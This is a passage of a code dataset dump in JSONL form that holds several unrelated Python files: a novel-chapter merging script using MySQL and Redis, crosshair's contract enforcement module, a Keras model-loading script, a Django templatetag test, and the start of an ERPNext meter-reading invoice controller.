novel_chapters_list[valss[6]]\n\n if update_chapters_number > mage_chapters_number:\n form_path_list = \"%s%s/%s/chapter.json\" % (FILE_BASE, novel_chapters_info[valss[6]], valss[6])\n form_recs = os.path.exists(form_path_list)\n #判断的文件是否存在\n\n if form_recs == False:\n print(\"书籍ID\", valss[6], \"没有内容\")\n continue\n\n with open(form_path_list, 'r') as form_path_f:\n form_path_chapters_list = form_path_f.read()\n if form_path_chapters_list:\n form_path_chapters_list = json.loads(form_path_chapters_list)\n else:\n continue\n\n if form_path_chapters_list[mage_chapters_number::]:\n chapter_id = mage_chapters_number\n for index,vs in enumerate(form_path_chapters_list[mage_chapters_number::]):\n chapter_id +=1\n chapters_list_data = {}\n chapters_list_ads = {}\n # 更新的新的章节\n chapters_list_data['source_id'] = novel_chapters_info[valss[6]]\n chapters_list_data['url'] = vs['url']\n chapters_list_data['add_time'] = vs['add_time']\n\n chapters_list_ads['_id'] = chapter_id\n chapters_list_ads['name'] = vs['name']\n chapters_list_ads['add_time'] = vs['add_time']\n self.add_novel_chapter_list(valss[1], chapter_id, chapters_list_data)\n mage_chapters_list.append(chapters_list_ads)\n\n with open(newsPath, 'w') as f:\n f.write(json.dumps(mage_chapters_list,ensure_ascii=False))\n\n for neaten_value in novel_novels_neaten:\n\n form_source_id = neaten_value[1]\n form_name_msg = \"来源的站点ID%s书籍ID:%s\" % (form_source_id,neaten_value[0])\n\n #章节的那边的数据更新的章节\n update_chapters_number = novel_chapters_list.get(neaten_value[0])\n\n if update_chapters_number == None:\n continue\n\n #当前的合并的书籍 更新的章节的数量\n chapters_number = neaten_value[2]\n # 比较的一下的书籍\n if update_chapters_number > chapters_number:\n formPath = \"%s%s/%s/chapter.json\" % (FILE_BASE, form_source_id, neaten_value[0])\n form_path_recss = os.path.exists(formPath)\n if form_path_recss == False:\n print(\"书籍\",neaten_value[0],\"没有数据\")\n continue\n\n with open(formPath, 'r') as ff:\n form_chapters_List = ff.read()\n\n if form_chapters_List:\n form_chapters_List = json.loads(form_chapters_List)\n form_chapters_limit = form_chapters_List[chapters_number::]\n form_chapters_count = len(form_chapters_List)\n form_chapters_List = {}\n #新网站网站章节列表\n for index,mage_vals in enumerate(mage_chapters_list):\n\n minnumber = int(index-5)\n maxnumber = int(index+6)\n # 原网站的章节列表\n for index,form_valus in enumerate(form_chapters_limit[minnumber:maxnumber]):\n rate = 0\n if mage_vals.get('name') and form_valus.get('name'):\n rate = difflib.SequenceMatcher(None, mage_vals['name'],form_valus['name']).quick_ratio()\n rate = int(round(rate,2) * 100)\n if rate > 95:\n form_chapters_file_list = {}\n #合并之后的数据\n mage_chapters_list_file_path = \"%s%s/%s/%d/list.json\" % (FILE_BASE, 35,mage_novel_id,mage_vals['_id'])\n mage_chapters_path_recss = os.path.exists(mage_chapters_list_file_path)\n\n if mage_chapters_path_recss == False:\n print(\"真的来这里了\")\n continue\n\n with open(mage_chapters_list_file_path,\"r\") as mage_chapters_f:\n mage_chapters_file_list = mage_chapters_f.read()\n mage_chapters_file_list = json.loads(mage_chapters_file_list)\n\n #检查来源的是否存在的了\n is_status = 0\n for vs in mage_chapters_file_list:\n if vs['source_id'] == form_source_id:\n is_status = 1\n\n if is_status == 0:\n #来源的站点的数据整合\n form_chapters_file_list['source_id'] = form_source_id\n form_chapters_file_list['url'] = form_valus['url']\n form_chapters_file_list['add_time'] = form_valus['add_time']\n mage_chapters_file_list.append(form_chapters_file_list)\n #添加的数据\n mage_chapters_file_list = json.dumps(mage_chapters_file_list,ensure_ascii=False)\n with open(mage_chapters_list_file_path, \"w\") as mage_chapters_f:\n mage_chapters_f.write(mage_chapters_file_list)\n print(\"原站点\",form_source_id,'更新至35',\"原书籍ID:\",neaten_value[0],\"更新的至书籍ID:\",mage_novel_id,\"更新的章节:\",mage_vals['_id'])\n # 更新的当前的书籍更新的总数\n\n else:\n print(form_name_msg, \"章节的已经更新到最新\")\n\n update_novel_novels_neaten_sql = \"update novel_novels_neaten set count=%s where novels_id=%s\" % (form_chapters_count, neaten_value[0])\n cursor.execute(update_novel_novels_neaten_sql)\n self.mysql.commit()\n else:\n print(form_name_msg,\"暂无新的章节的更新信息\")\n\n else:\n print(\"暂无更新\")\n # except Exception as e:\n # print(e)\n # exit()\n # self.sredis.delete(\"update_novel\")\n # self.sredis.delete(\"update_novel\")\n\n\n \"\"\"\n 合并新书必须拷贝章节内容\n \"\"\"\n def add_new_novels(self):\n if self.sredis.get(\"add_new_novels\"):\n print(\"程序在进行中。请等待。。。\")\n exit()\n else:\n self.sredis.set(\"add_new_novels\", 1)\n\n lg = 0\n page_index = 0\n limit = 1000\n cursor = self.mysql.cursor()\n try:\n while lg == 0:\n page = page_index * limit\n sql = \"select id,novels_ids from `novel_novels_gather` where new_novels_id =0 ORDER BY weight asc limit %d,%d\" % (page, limit)\n\n cursor.execute(sql)\n novels_ids = cursor.fetchall()\n lencut = len(novels_ids)\n\n if lencut == 0:\n lg = 1\n cursor.close()\n else:\n if novels_ids:\n for val in novels_ids:\n\n #获取小说的第一个站点\n novel_id_sql = \"select novels_id from novel_novels_neaten where source_id in(3,1,82,15,4) and novels_id in(%s)\" %(val[1])\n cursor.execute(novel_id_sql)\n novels_ids = cursor.fetchone()\n if novels_ids == None:\n recs = val[1].split(',')\n novels_ids = recs[0]\n else:\n novels_ids = novels_ids[0]\n\n novels_ids = int(novels_ids)\n print(\"分析原小说ID\",novels_ids)\n novel_novels_sql = \"select * from novel_novels where id=%d \" %(novels_ids)\n cursor.execute(novel_novels_sql)\n novels_info = cursor.fetchone()\n\n\n if novels_info:\n name_author_que_str = \"%s$c%s\" %(novels_info[1],novels_info[6])\n name_author_que = hashlib.md5(name_author_que_str.encode()).hexdigest()\n #查看是否填写过新书\n restar_sql = \"select id from novel_novels where name_author_que='%s'\" %(name_author_que)\n \n cursor.execute(restar_sql)\n recs = cursor.fetchone()\n if recs == None:\n \n fromPath = \"%s%s/%s/chapter.json\" % (FILE_BASE, novels_info[16], novels_info[0])\n\n if os.path.isfile(fromPath) == False:\n print(\"没有目录\")\n else:\n \n with open(fromPath, 'r') as f:\n flist = f.read()\n if flist:\n print(\"新版分析\")\n chapter_list = json.loads(flist)\n\n else:\n chapter_list = \"\"\n print(\"目录没有内容\")\n if chapter_list:\n\n #添加的新书\n instr = 'insert into novel_novels (name,url,corver_url,corver_path,info,author,weight,read_num,word_num,is_action,has_content,gender,add_time,update_time,types_id,source_id,is_show,name_author_que,form_novels_id) VALUES'\n instr += '(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)'\n cursor.execute(instr,args= (novels_info[1],novels_info[2],novels_info[3],novels_info[4],novels_info[5],novels_info[6],novels_info[7],novels_info[8],novels_info[9],novels_info[10],novels_info[11],novels_info[12],novels_info[13],novels_info[14],novels_info[15],35,novels_info[17],name_author_que,novels_info[0]))\n self.mysql.commit()\n new_novel_id = cursor.lastrowid\n else:\n new_novel_id = False\n if new_novel_id:\n\n newsPath = \"%s%s/%s/\" % (FILE_BASE, 35,new_novel_id)\n newsFilePath = newsPath+\"chapter.json\"\n novel_chapters_path = \"%s/%s/%s\" %(35,new_novel_id,\"chapter.json\")\n #TODO 添加novel_chapters 表数\n #判断文件是否存在\n is_file_path = os.path.isfile(fromPath)\n if is_file_path == True:\n os.makedirs(newsPath)\n\n #json.dumps()\n new_chapter = []\n if chapter_list:\n for chapter in chapter_list:\n new_chapters = {}\n chapters_list_data = {}\n new_chapters['_id'] = chapter['_id']\n new_chapters['name'] = chapter['name']\n new_chapters['add_time'] = chapter['add_time']\n chapters_list_data['source_id'] = novels_info[16]\n chapters_list_data['url'] = chapter['url']\n chapters_list_data['add_time'] = chapter['add_time']\n self.add_novel_chapter_list(new_novel_id, chapter['_id'],chapters_list_data)\n new_chapter.append(new_chapters)\n #最新章节\n new_chapter_name = new_chapters['name']\n\n upcount = len(new_chapter)\n\n with open(newsFilePath, 'w') as f:\n f.write(json.dumps(new_chapter,ensure_ascii=False))\n #修改合并表信息\n update_sql = \"update novel_novels_gather set new_novels_id=%d,form_novels_id=%d where id=%d\" %(new_novel_id,novels_info[0],val[0])\n cursor.execute(update_sql)\n neaten_update_sql = \"update novel_novels_neaten set count=%d where novels_id=%d\" %(upcount,novels_info[0])\n cursor.execute(neaten_update_sql)\n self.mysql.commit()\n #添加的更新的最新章节的信息\n add_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n insert_sql = 'insert into novel_chapters (new_name,path,novels_id,update_time,add_time,count,is_sync) VALUES (\"%s\",\"%s\",%d,\"%s\",\"%s\",%d,1)' %(new_chapter_name,novel_chapters_path,new_novel_id,add_time,add_time,upcount)\n cursor.execute(insert_sql)\n self.mysql.commit()\n else:\n print(\"暂无数据\")\n print(\"生成成功\")\n else:\n print(\"新增数据失败\")\n else:\n print(\"已经存在\")\n else:\n print(\"不存在\")\n else:\n print(\"没有相似小说\")\n except Exception as e:\n print(e)\n self.sredis.delete(\"add_new_novels\")\n\n self.sredis.delete(\"add_new_novels\")\n\n \"\"\"\n 生成的子目录信息\n source_id 站点ID\n novels_id 书籍ID\n chapter_id 章节ID\n data 列表的字典\n \"\"\"\n def add_novel_chapter_list(self,novels_id,chapter_id,data):\n\n path = \"%s%s/%s/%s/\" % (FILE_BASE, 35, novels_id,chapter_id)\n rec = os.path.exists(path)\n file_path = path + \"list.json\"\n if rec == False:\n os.makedirs(path)\n list_data = []\n else:\n with open(file_path,'r') as fr:\n list_data = json.loads(fr.read())\n\n with open(file_path,mode='w') as f:\n if rec == True:\n source_id_rel = 0\n for ival in list_data:\n if data['source_id'] == ival['source_id']:\n source_id_rel = 1\n if source_id_rel == 0:\n list_data.append(data)\n else:\n list_data.append(data)\n f.write(json.dumps(list_data,ensure_ascii=False))\n return 1\n\n \"\"\"\n 获取语新增数据\n \"\"\"\n def get_novel_neaten(self):\n if self.sredis.get(\"mage_novel_neaten\"):\n print(\"程序在进行中。请等待。。。\")\n exit()\n else:\n self.sredis.set(\"mage_novel_neaten\",1)\n #分页预加载\n lg = 0\n page_index = 0\n limit = 100\n cursor = self.mysql.cursor()\n while lg == 0:\n page = page_index * limit\n sql = \"select name_author,group_concat(novels_id) as novels_ids,max(weight) as weight from `novel_novels_neaten` GROUP BY name_author HAVING count(1) > 1 ORDER BY max(weight) asc ,count(1) desc limit %d,%d\" % (page, limit)\n cursor.execute(sql)\n novel_list = cursor.fetchall()\n lencut = len(novel_list)\n if lencut == 0 :\n lg = 1\n cursor.close()\n else:\n if novel_list:\n instr = 'insert ignore into novel_novels_gather (name_author,name_author_que,novels_ids,weight) values'\n for index,val in enumerate(novel_list,1):\n name_authot_que = hashlib.md5(val[0].encode()).hexdigest()\n if index == lencut:\n str = '(\"%s\",\"%s\",\"%s\",%d)' % (val[0], name_authot_que, val[1],val[2])\n else:\n str = '(\"%s\",\"%s\",\"%s\",%d),' % (val[0], name_authot_que, val[1],val[2])\n\n instr += str\n cursor.execute(instr)\n self.mysql.commit()\n print(\"更新第\",page_index,'页')\n page_index += 1\n self.sredis.delete(\"mage_novel_neaten\")\n def novel_neaten(self):\n if self.sredis.get(\"novel_neaten\"):\n print(\"程序在使用中。。。。\")\n exit()\n else:\n self.sredis.set(\"novel_neaten\",1)\n #数据整理\n cursor = self.mysql.cursor()\n #查询的信息的最大的数据\n maxsql = \"select novels_id from novel_novels_neaten order by novels_id desc limit 1\"\n cursor.execute(maxsql)\n neaten_info = cursor.fetchone()\n if neaten_info :\n neaten_novel_id = neaten_info[0]\n countsql = \"select count(1) from novel_novels where id>%d and has_content>0 limit 1\" % (neaten_novel_id)\n else:\n neaten_novel_id = ''\n countsql = \"select count(1) from novel_novels where has_content>0 limit 1\"\n\n cursor.execute(countsql)\n scount = cursor.fetchone()\n if scount:\n scount = scount[0]\n print(scount)\n pagecont = int(scount/1000)\n pagecont = pagecont+1\n for i in range(pagecont):\n self.curm_sql(neaten_novel_id,i);\n print(\"更新到分页\",i)\n cursor.close()\n self.sredis.delete(\"novel_neaten\");\n print(\"数据整理完成\")\n def curm_sql(self,neaten_novel_id=0,page=0,limit = 1000):\n page = page * 1000\n if neaten_novel_id:\n sql = \"select id,source_id,name,url,author,weight,has_content from novel_novels where id>%d and has_content>0 limit %d,%d\" % (neaten_novel_id,page,limit)\n else:\n sql = \"select id,source_id,name,url,author,weight,has_content from novel_novels where has_content>0 limit %d,%d\" %(page,limit)\n cursor = self.mysql.cursor()\n cursor.execute(sql)\n novel_list = cursor.fetchall()\n\n if novel_list:\n instr = 'insert into novel_novels_neaten (novels_id,url,source_id,name_author,count,weight,has_content) values'\n #当前的书籍总数\n novel_list_cont = len(novel_list)\n for index,val in enumerate(novel_list,1):\n name_author = \"%s$c%s\" %(val[2],val[4])\n\n if index == novel_list_cont:\n str = '(%d,\"%s\",%d,\"%s\",%d,%d)' % (val[0], val[3], val[1], name_author, 0, val[5])\n else:\n str = '(%d,\"%s\",%d,\"%s\",%d,%d),' % (val[0], val[3], val[1], name_author, 0, val[5])\n\n instr +=str\n\n cursor.execute(instr)\n self.mysql.commit()\n cursor.close()\nif __name__ == '__main__':\n # sys_name = sys.argv[1]\n r = novelMarge()\n r.get_update_novel_gather()\n # if sys_name == \"update_novel\":\n # r.get_update_novel_gather()\n # elif sys_name == \"add_new_novels\":\n # r.add_new_novels()\n # elif sys_name == \"mage_novel_neaten\":\n # r.get_novel_neaten()\n # elif sys_name == \"novel_neaten\":\n # r.novel_neaten()\n\n # 第四步 把多个章节内容合并成list.json 格式\n # self.get_update_novel_gather()\n # 第三步 合并出新的书籍 创建新书籍\n # self.add_new_novels()\n # 第二部要合并数据缓存\n # self.get_novel_neaten()\n # 第一步 项目执行次数\n # self.novel_neaten()\n\n","sub_path":"novel_merge_duo.py","file_name":"novel_merge_duo.py","file_ext":"py","file_size_in_byte":28329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"212538030","text":"import builtins\nimport contextlib\nimport copy\nimport inspect\nimport functools\nimport sys\nimport traceback\nimport types\nfrom typing import *\nfrom crosshair.condition_parser import fn_globals\nfrom crosshair.condition_parser import Conditions\nfrom crosshair.condition_parser import ClassConditions\nfrom crosshair.condition_parser import ConditionParser\nfrom crosshair.util import IdentityWrapper\nfrom crosshair.util import AttributeHolder\nfrom crosshair.util import debug\n\nclass PreconditionFailed(BaseException):\n pass\n\n\nclass PostconditionFailed(BaseException):\n pass\n\n\ndef is_singledispatcher(fn: Callable) -> bool:\n return hasattr(fn, 'registry') and isinstance(fn.registry, Mapping) # type: ignore\n\n\ndef EnforcementWrapper(fn: Callable, conditions: Conditions, enforced: 'EnforcedConditions') -> Callable:\n signature = conditions.sig\n\n def wrapper(*a, **kw):\n fns_enforcing = enforced.fns_enforcing\n if fns_enforcing is None or fn in fns_enforcing:\n return fn(*a, **kw)\n #debug('Calling enforcement wrapper ', fn, signature, 'with', a, kw)\n bound_args = signature.bind(*a, **kw)\n bound_args.apply_defaults()\n old = {}\n mutable_args = conditions.mutable_args\n mutable_args_remaining = set(mutable_args) if mutable_args is not None else set()\n for argname, argval in bound_args.arguments.items():\n try:\n old[argname] = copy.copy(argval)\n except Exception as exc:\n pass\n if argname in mutable_args_remaining:\n mutable_args_remaining.remove(argname)\n if mutable_args_remaining:\n raise PostconditionFailed('Unrecognized mutable argument(s) in postcondition: \"{}\"'.format(\n ','.join(mutable_args_remaining)))\n with enforced.currently_enforcing(fn):\n for precondition in conditions.pre:\n #debug(' precondition eval ', precondition.expr_source)\n # TODO: is fn_globals required here?\n args = {**fn_globals(fn), **bound_args.arguments}\n if not precondition.evaluate(args):\n raise PreconditionFailed(\n f'Precondition \"{precondition.expr_source}\" was not satisfied '\n f'before calling \"{fn.__name__}\"')\n ret = fn(*a, **kw)\n with enforced.currently_enforcing(fn):\n lcls = {**bound_args.arguments, '__return__': ret,\n '_': ret, '__old__': AttributeHolder(old)}\n args = {**fn_globals(fn), **lcls}\n for postcondition in conditions.post:\n #debug(' postcondition eval ', postcondition.expr_source, fn, lcls['_'])\n if postcondition.evaluate and not postcondition.evaluate(args):\n raise PostconditionFailed('Postcondition failed at {}:{}'.format(\n postcondition.filename, postcondition.line))\n #debug('Completed enforcement wrapper ', fn)\n return ret\n functools.update_wrapper(wrapper, fn)\n return wrapper\n\n\nclass EnforcedConditions:\n def __init__(self,\n condition_parser: ConditionParser,\n *envs: Mapping[str, object],\n interceptor=lambda x: x):\n self.condition_parser = condition_parser\n self.envs = envs\n self.interceptor = interceptor\n self.fns_enforcing: Optional[Set[Callable]] = set()\n self.wrapper_map: Dict[object, Callable] = {}\n self.original_map: Dict[IdentityWrapper[object], object] = {}\n\n def _wrap_class(self, cls: type) -> None:\n if not self.condition_parser.get_class_conditions(cls).has_any():\n return\n #debug('wrapping class ', cls)\n for superclass in cls.mro():\n super_conditions = self.condition_parser.get_class_conditions(superclass)\n if super_conditions.has_any():\n self._wrap_class_members(superclass, super_conditions)\n\n def _wrap_class_members(self, cls: type, class_conditions: ClassConditions) -> None:\n method_conditions = dict(class_conditions.methods)\n for method_name, method in list(cls.__dict__.items()):\n # Note that `method` is post-property resolution. Also grab the raw member:\n raw_method = cls.__dict__.get(method_name)\n if raw_method is None: # likely defined on a superclass\n continue\n conditions = method_conditions.get(method_name)\n if conditions is None:\n continue\n if isinstance(raw_method, (staticmethod, classmethod)):\n inner_wrapper = self._wrap_fn(raw_method.__func__, raw_fn=raw_method, conditions=conditions)\n wrapper: object = type(raw_method)(inner_wrapper)\n self.original_map[IdentityWrapper(wrapper)] = raw_method\n else:\n wrapper = self._wrap_fn(method, raw_fn=raw_method, conditions=conditions)\n setattr(cls, method_name, wrapper)\n\n def _transform_singledispatch(self, fn, transformer):\n overloads = list(fn.registry.items())\n wrapped = functools.singledispatch(transformer(overloads[0][1]))\n for overload_typ, overload_fn in overloads[1:]:\n wrapped.register(overload_typ)(transformer(overload_fn))\n return wrapped\n\n def is_enforcement_wrapper(self, value):\n return IdentityWrapper(value) in self.original_map\n\n @contextlib.contextmanager\n def currently_enforcing(self, fn: Callable):\n if self.fns_enforcing is None:\n yield None\n else:\n self.fns_enforcing.add(fn)\n try:\n yield None\n finally:\n self.fns_enforcing.remove(fn)\n\n @contextlib.contextmanager\n def disabled_enforcement(self):\n prev = self.fns_enforcing\n assert prev is not None\n self.fns_enforcing = None\n try:\n yield None\n finally:\n self.fns_enforcing = prev\n\n @contextlib.contextmanager\n def enabled_enforcement(self):\n prev = self.fns_enforcing\n assert prev is None\n self.fns_enforcing = set()\n try:\n yield None\n finally:\n self.fns_enforcing = prev\n\n def __enter__(self):\n next_envs = [env.copy() for env in self.envs]\n for env, next_env in zip(self.envs, next_envs):\n for (k, v) in env.items():\n if isinstance(v, (types.FunctionType, types.BuiltinFunctionType)):\n if is_singledispatcher(v):\n wrapper = self._transform_singledispatch(\n v, self._wrap_fn)\n else:\n wrapper = self._wrap_fn(v)\n if wrapper is v:\n continue\n next_env[k] = wrapper\n elif isinstance(v, type):\n self._wrap_class(v)\n for env, next_env in zip(self.envs, next_envs):\n env.update(next_env)\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n next_envs = [env.copy() for env in self.envs]\n for env, next_env in zip(self.envs, next_envs):\n for (k, v) in list(env.items()):\n next_env[k] = self._unwrap(v)\n for env, next_env in zip(self.envs, next_envs):\n env.update(next_env)\n return False\n\n def _unwrap(self, value):\n if self.is_enforcement_wrapper(value):\n return self.original_map[IdentityWrapper(value)]\n elif is_singledispatcher(value):\n return self._transform_singledispatch(value, self._unwrap)\n elif isinstance(value, type):\n self._unwrap_class(value)\n return value\n\n def _unwrap_class(self, cls: type):\n for method_name, method in list(cls.__dict__.items()):\n if self.is_enforcement_wrapper(method):\n setattr(cls, method_name,\n self.original_map[IdentityWrapper(method)])\n\n def _wrap_fn(self, fn: Callable,\n raw_fn: object = None,\n conditions: Optional[Conditions] = None) -> Callable:\n # `raw_fn` is the unresolved descriptor, as appropriate.\n if raw_fn is None:\n raw_fn = fn\n wrapper = self.wrapper_map.get(raw_fn)\n if wrapper is not None:\n return wrapper\n conditions = conditions or self.condition_parser.get_fn_conditions(fn)\n if conditions and conditions.has_any():\n wrapper = EnforcementWrapper(\n self.interceptor(fn), conditions, self)\n functools.update_wrapper(wrapper, fn)\n else:\n wrapper = fn\n self.wrapper_map[raw_fn] = wrapper\n self.original_map[IdentityWrapper(wrapper)] = raw_fn\n return wrapper\n","sub_path":"crosshair/enforce.py","file_name":"enforce.py","file_ext":"py","file_size_in_byte":8880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"404056141","text":"from keras.models import model_from_yaml\nimport numpy as np\nfrom diploma_two import y_test, X_test, X_train\nimport cv2\n\nyaml_file = open('diplomaTwo.yaml', 'r')\nloaded_model_yaml = yaml_file.read()\nyaml_file.close()\n\nloaded_model = model_from_yaml(loaded_model_yaml)\nloaded_model.load_weights(\"diplomaTwo.h5\")\nprint(\"Loaded model from disk\")\n\n# evaluate loaded model on test data\nloaded_model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=['accuracy'])\nscore = loaded_model.evaluate(X_test, y_test, verbose=0)\nprint(\"%s: %.2f%%\" % (loaded_model.metrics_names[1], score[1]*100))\n\nfrom PIL import Image\nfrom resizeimage import resizeimage\n\ndef inverte(imagem, name):\n imagem = (255-imagem)\n cv2.imwrite(name, imagem)\n\nname = '0'\npixels = 784\n\nimg = cv2.imread(\"test_images/\" + name + \".jpg\")\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\ncv2.imwrite(\"test_images/\" + name + \".jpg\", img)\nimg = cv2.imread(\"test_images/\" + name + \".jpg\")\n\narrayPix = np.asarray(img)\nprint(arrayPix.shape, ',', X_train.shape[0], ',', arrayPix.shape[0])\narrayPix = arrayPix.reshape(3, 28, 28)\n# arrayPix = arrayPix.reshape(1, 784)\n# X_train = X_train.reshape(X_train.shape[0], 1, 28, 28).astype('float32')\narrayPix = arrayPix.reshape(3, 1, 28, 28)\na = loaded_model.predict(arrayPix)\nprint(a)\na = a.argmax()\nprint(a)\nprint('B\\n', 'B\\n', 'Y\\n')","sub_path":"diploma_two_run.py","file_name":"diploma_two_run.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"427547","text":"import pytest\nfrom django.http.request import QueryDict\n\nfrom byro.common.templatetags.url_replace import url_replace\n\n\nclass request:\n def __init__(self, get):\n self.GET = QueryDict(get)\n\n\n@pytest.mark.parametrize('GET,key,value,expected', (\n ('foo=bar', 'foo', 'baz', ['foo=baz']),\n ('foo=bar', 'fork', 'baz', ['foo=bar', 'fork=baz']),\n))\ndef test_templatetag_url_replace(GET, key, value, expected):\n result = url_replace(request(GET), key, value)\n assert all(e in result for e in expected)\n","sub_path":"src/tests/unit/test_common_templatetags.py","file_name":"test_common_templatetags.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"416193936","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2018, Paul Karugu and contributors\n# For license information, please see license.txt\n\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe.model.document import Document\n\nclass MeterReadingCapture(Document):\n\t'''\n\tThis is the Meter Reading Sheet Capture\n\tController class\n\t'''\n\tsales_invoice_items_holder = []\n\n\tdef validate(self):\n\t\t'''\n\t\tchecks\n\t\t'''\n\t\tpass\n\n\t\n\tdef on_update(self):\n\t\t'''\n\t\tFunction that runs when the document is saved\n\t\t'''\n\t\t# collect all required meter reading sheet items \n\t\tsales_invoice_items_list = self.get_meter_reading_sheet_items()\n\t\n\t\t# create sales invoices\n\t\tcreate_new_sales_invoice(sales_invoice_items_list)\n\n\tdef on_trash(self):\n\t\tpass\n\n\tdef get_meter_reading_sheet_items(self):\n\t\t'''\n\t\tFunction that gets all customers and their details\n\t\tfrom the meter reading sheet of the document\n\t\targ:\n\t\t\tself\n\t\toutput:\n\t\t\t{\"status\":True \"message\":[[list of items],...,[..]]}\n\t\t\tor\n\t\t\t{\"status\":True/False,\"message\":failure message}\n\t\t'''\n\t\t# initialize the sales_invoice_items_holder as empty\n\t\tsales_invoice_items_holder = []\n\t\t# loop through all the items in the meter reading sheet\n\t\tfor meter_reading in self.meter_reading_sheet:\n\t\t\t# get required details\n\t\t\tsales_invoice_details = {}\n\n\t\t\t# get area and zone for current root\n\t\t\tarea_and_zone = get_zone_and_area_using_route(self.route)\n\t\t\n\t\t\tsales_invoice_details[\"customer\"] = meter_reading.customer_name\n\t\t\tsales_invoice_details[\"billing_period\"] = self.billing_period\n\t\t\tsales_invoice_details[\"route\"] = self.route\n\t\t\tsales_invoice_details[\"area\"] = area_and_zone[\"area\"]\n\t\t\tsales_invoice_details[\"zone\"] = area_and_zone[\"zone\"]\n\t\t\tsales_invoice_details[\"previous_reading\"] = meter_reading.previous_manual_reading\n\t\t\tsales_invoice_details[\"current_reading\"] = meter_reading.current_manual_readings\n\t\t\tsales_invoice_details[\"consumption\"] = meter_reading.manual_consumption\n\t\t\tsales_invoice_details[\"type_of_bill\"] = \"Actual\"\n\n\t\t\t# get the disconnection profile for current customer\n\t\t\tfound_customer_group = meter_reading.type_of_customer\n\t\t\tcurrent_disconnection_profile = get_disconnection_profile(found_customer_group)\n\n\t\t\tsales_invoice_details[\"disconnection_profile\"] = current_disconnection_profile\n\t\t\tsales_invoice_details[\"type_of_customer\"] = found_customer_group\n\t\t\tsales_invoice_details[\"customer_type\"] = meter_reading.customer_type\n\t\t\tsales_invoice_details[\"type_of_invoice\"] = \"Bill\"\n\t\t\tsales_invoice_details[\"reading_code\"] = meter_reading.reading_code\n\n\n\t\t\t# append the dictionary to sales_invoice_items_holder\n\t\t\tsales_invoice_items_holder.append(sales_invoice_details)\n\t\t\n\t\treturn sales_invoice_items_holder\n\ndef create_new_sales_invoice(list_of_sales_invoice_details):\n\t'''\n\tFunction that creates a new sales invoice for meter \n\treading a meter reading sheet\n\t'''\n\t# create invoices\n\tfor list_item in list_of_sales_invoice_details:\n\t\tdoc = frappe.get_doc({\"doctype\":\"Sales Invoice\"})\n\t\tdoc.customer = list_item[\"customer\"]\n\t\tdoc.billing_period = list_item[\"billing_period\"]\n\t\tdoc.route = list_item[\"route\"]\n\t\tdoc.area = list_item[\"area\"]\n\t\tdoc.zone = list_item[\"zone\"]\n\t\tdoc.previous_reading = list_item[\"previous_reading\"]\n\t\tdoc.current_reading = list_item[\"current_reading\"]\n\t\tdoc.consumption = list_item[\"consumption\"]\n\t\tdoc.type_of_bill = list_item[\"type_of_bill\"]\n\t\tdoc.disconnection_profile = list_item[\"disconnection_profile\"][\"disconnection_name\"]\n\t\tdoc.type_of_customer = list_item[\"type_of_customer\"]\n\t\tdoc.customer_type = list_item[\"customer_type\"]\n\t\tdoc.type_of_invoice = list_item[\"type_of_invoice\"]\n\n\t\t# check reading code\n\t\tif(list_item[\"customer_type\"] == \"Flat\"):\n\t\t\t# its reading code should always be normal\n\t\t\tif(list_item[\"reading_code\"] == \"Normal Reading\"):\n\t\t\t\t# set consumption to None and instead set estimated consumption\n\t\t\t\tdoc.estimated_consumption = list_item[\"consumption\"]\n\t\t\t\tdoc.consumption = None\n\t\t\telse:\n\t\t\t\tfrappe.throw(\"Customer {} is a Flat Rate Customer hence the Reading Code Should be Normal\".format(list_item[\"customer\"]))\n\t\telif(list_item[\"customer_type\"] == \"Metered\"):\n\t\t\t# just take the consumption but check for meter status\n\t\t\tif(list_item[\"reading_code\"] == \"Normal Reading\"):\n\t\t\t\tpass\n\n\t\t\telif(list_item[\"reading_code\"] == \"Meter Stuck\"):\n\t\t\t\t# set consumption to None and instead set estimated consumption \n\t\t\t\tdoc.estimated_consumption = list_item[\"consumption\"]\n\t\t\t\tdoc.consumption = None\t\n\t\t\telse:\n\t\t\t\tfrappe.throw(\"An Error Occured with the Reading Code\")\n\t\telse:\n\t\t\tfrappe.throw(\"An Error Occured With Customer Type\")\n\t\t\n\n\t\t# get applicable items\n\t\tapplicable_tarrifs = get_applicable_tariff(list_item[\"type_of_customer\"],\"Tariff\",list_item[\"consumption\"])\n\t\tapplicable_rent = get_applicable_rent(list_item[\"type_of_customer\"],\"Meter Rent\")\n\t\t\n\t\t# loop throught applicable tarrifs\n\t\titems_and_quantities = loop_through_tariffs(applicable_tarrifs,list_item[\"consumption\"])\n\t\t# Add applicable tarrif rates\n\t\tfor item in items_and_quantities:\n\t\t\tdoc.append(\"items\", {\n\t\t\t\t\"item_code\": item[\"name\"],\n\t\t\t\t\"qty\": item[\"qty\"],\n\t\t\t\t'description': \"Monthly Bill\",\n\t\t\t\t'uom':'Nos',\n\t\t\t\t'conversion_factor': 1.0,\n\t\t\t\t'income_account': 'Sales - VW',\n\t\t\t\t'cost_center': 'Main - VW'\n\t\t\t})\n\t\t# add applicable meter rent\n\t\tif(list_item[\"customer_type\"] == \"Flat\"):\n\t\t\t# no meter rent applies hence pass\n\t\t\tpass\n\t\telif(list_item[\"customer_type\"] == \"Metered\"):\n\t\t\tname_of_rent_item = applicable_rent[0][0]\n\t\t\tdoc.append(\"items\",{\n\t\t\t\t\t\"item_code\": name_of_rent_item,\n\t\t\t\t\t\"qty\": 1,\n\t\t\t\t\t'description': \"Monthly Bill\",\n\t\t\t\t\t'uom':'Nos',\n\t\t\t\t\t'conversion_factor': 1.0,\n\t\t\t\t\t'income_account': 'Sales - VW',\n\t\t\t\t\t'cost_center': 'Main - 